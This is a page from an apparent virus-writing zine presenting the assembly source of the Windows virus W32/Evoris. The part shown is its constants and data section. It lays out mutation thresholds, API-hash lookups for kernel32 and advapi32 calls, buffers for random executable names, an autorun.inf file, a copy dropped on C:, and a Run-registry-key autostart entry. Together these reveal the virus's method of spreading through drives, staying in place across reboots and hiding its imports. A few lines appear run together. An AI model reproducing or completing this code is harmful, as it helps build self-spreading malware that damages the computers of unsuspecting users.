Virus-writing Bulletin

Presents!

W32/Evoris

-
. ● glósóli ● .

See also:
; ############################################################################
; ############################################################################
; #####
; ##### CONSTANT DEFINITION
; #####

 AminoStartInMap	EQU 0x400+(StAmino-start)
 AlphabethStartInMap	EQU 0x400+(StartAlphabeth-start)

 ; One out of n bytes will be changed: 7 > n > (2^32 - 1)


 VarThreshold1 EQU 5417	 ; 87.5%

 xchgThreshold1 EQU 39155	 ; 25.0%

 InsertThreshold1 EQU 0x05	 ; 20.0%

; #####
; ##### CONSTANT DEFINITION
; #####
; ############################################################################
; ############################################################################
; ############################################################################
; ############################################################################
; #####
; #####  DATA
; #####

DataOffset:
	Place4Life	dd 0x0
	RandomNumber	dd 0x0

			db 0x0
	  Driveletter1 db 0x0
			db 0x0, 0x0	 ; buffer for ":\"

	RandomFileName: times 8 db 0x0	 ; buffer for random filename
	  rndext:	times 4 db 0x0	 ; .exe
			db 0x0

			db 0x0
	  Driveletter2 db 0x0
			db 0x0, 0x0	; buffer for ":\"

	  autoruninf:	times 11 db 0x0
			db 0x0


			db 0x0
	  Driveletter3 db 0x0, 0x0, 0x0   ; buffer for "C:\"

	  virusname:	times 8 db 0x0	   ; virus filename at C:
	  virext:	times 4 db 0x0	   ; .exe
			db 0x0

	FileHandle	dd 0x0
	MapHandle	dd 0x0
	MapPointer	dd 0x0
	FileSize	dd 0x0

	stDLLkernel32: times 12 db 0x0
		   db 0x0
	stDLLadvapi32: times 12 db 0x0
		   db 0x0

	hDLLlibrary32 dd 0x0

	hAddressTable dd 0x0
	hNamePointerTable dd 0x0
	hOrdinalTable dd 0x0

	APINumber dd 0x0

  APINumberKernel EQU 12
  APINumberAdvapi EQU 2


	hMagicNumberPointer dd 0x0
  APIMagicNumbers:
	mCloseHandle dd 0x0F05
	mCopyFileA  dd 0x03E6
	mCreateFileA dd 0x03FF
	mCreateFileMappingA dd 0x06F3
;    mCreateProcessA  dd 0x00EC
	mGetDriveType	 dd 0x0B2F
	mGetCommandLineA dd 0x0D14
	mGetFileSize	 dd 0x0705
	mWriteFile	 dd 0x0AC8
	mGetTickCount	 dd 0x060C
	mMapViewOfFile	 dd 0x0DEA
;    mSleep      dd 0x006F
	mUnmapViewOfFile dd 0x00F4
	mSetErrorMode	 dd 0x0923

  APIMagicNumbersReg:
	mRegCreateKey	 dd 0x0731
	mRegSetValueEx	 dd 0x0AE6
;    mRegCloseKey   dd 0x05F4	hAddressePointer dd 0x0
  APIAddresses:
	hCloseHandle dd 0x0
	hCopyFileA  dd 0x0
	hCreateFileA dd 0x0
	hCreateFileMappingA dd 0x0
;    hCreateProcessA  dd 0x0
	hGetDriveType	 dd 0x0
	hGetCommandLineA dd 0x0
	hGetFileSize	 dd 0x0
	hWriteFile	 dd 0x0
	hGetTickCount	 dd 0x0
	hMapViewOfFile	 dd 0x0
;    hSleep      dd 0x0
	hUnmapViewOfFile dd 0x0
	hSetErrorMode	 dd 0x0

  APIAddressesReg:
	hRegCreateKey	 dd 0x0
	hRegSetValueEx	 dd 0x0
;    hRegCloseKey   dd 0x0	xchgBuffer dd 0x0

	InsertA  dd 0x0
	Insertx  dd 0x0
	Inserty  dd 0x0
	InsertWrt dd 0x0

	stSubKey: times 46 db 0x0 ; SOFTWARE\Microsoft\Windows\CurrentVersion\Run
				 ; will be created at runtime

	hRegKey dd 0x0

	AutoStartContentStart: times 51 db 0x0
	AutoStartContentEnd:


StartUp_struct:
 StartUp_struct_cb		 dd 0
 StartUp_struct_lpReserved	 dd 0
 StartUp_struct_lpDesktop	 dd 0
 StartUp_struct_lpTitle	 dd 0
 StartUp_struct_dwX		 dd 0
 StartUp_struct_dwY		 dd 0
 StartUp_struct_dwXSize	 dd 0
 StartUp_struct_dwYSize	 dd 0
 StartUp_struct_dwXCountChars	 dd 0
 StartUp_struct_dwYCountChars	 dd 0
 StartUp_struct_dwFillAttribute dd 0
 StartUp_struct_dwFlags	 dd 0
 StartUp_struct_wShowWindow	 dw 0
 StartUp_struct_cbReserved2	 dw 0
 StartUp_struct_lpReserved2	 dd 0
 StartUp_struct_hStdInput	 dd 0
 StartUp_struct_hStdOutput	 dd 0
 StartUp_struct_hStdError	 dd 0


ProcessInfo_Struct:
 PROCESS_INFORMATION_hProcess	 dd 0
 PROCESS_INFORMATION_hThread	 dd 0
 PROCESS_INFORMATION_dwProcessId dd 0
 PROCESS_INFORMATION_dwThreadId dd 0


; #####
; #####  DATA
; #####
; ############################################################################
; ############################################################################

Virus-writing Bulletin 2011